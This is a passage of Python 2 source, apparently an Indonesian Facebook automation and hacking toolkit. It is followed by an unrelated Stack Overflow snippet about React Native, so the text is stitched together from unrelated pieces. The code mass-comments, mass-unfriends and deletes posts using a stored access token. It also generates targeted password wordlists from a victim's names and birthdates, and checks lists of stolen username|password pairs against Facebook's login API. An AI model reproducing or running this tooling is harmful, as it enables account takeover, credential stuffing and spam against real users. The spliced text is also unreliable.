'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def deletepost(): os.system('clear') try: toket = open('login.txt', 'r').read() nam = requests.get('https://graph.facebook.com/me?access_token=' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...') print 40 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def accept(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket) teman = json.loads(r.text) if '[]' in str(teman['data']): print '\x1b[1;91m[!] Tidak ada permintaan pertemanan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in teman['data']: gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def unfriend(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def lain(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Buat postingan' print '\x1b[1;37;40m2. Buat Wordlist' print '\x1b[1;37;40m3. Akun Checker' print '\x1b[1;37;40m4. Lihat daftar grup' print '\x1b[1;37;40m5. Profile Guard' print print '\x1b[1;97m ->Coming soon<-' print print '\x1b[1;31;40m0. Kembali' print pilih_lain() def pilih_lain(): other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Jangan kosong' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada' pilih_lain() def status(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] Jangan kosong' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def wordlist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 40 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] Gagal membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def check_akun(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 40 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif 'www.facebook.com' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def grupsaya(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id']

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            Display data from two json files in react native
            Asked 2020-May-17 at 23:55

            I have js files Dashboard and Adverts. I managed to get Dashboard to list the information in one json file (advertisers), but when clicking on an advertiser I want it to navigate to a separate page that will display some data (Say title and text) from the second json file (productadverts). I can't get it to work. Below is the code for the Dashboard and next for Adverts. Then the json files



            Answered 2020-May-17 at 23:55

            The new object to get params in React Navigation 5 is:

            Source https://stackoverflow.com/questions/61859411

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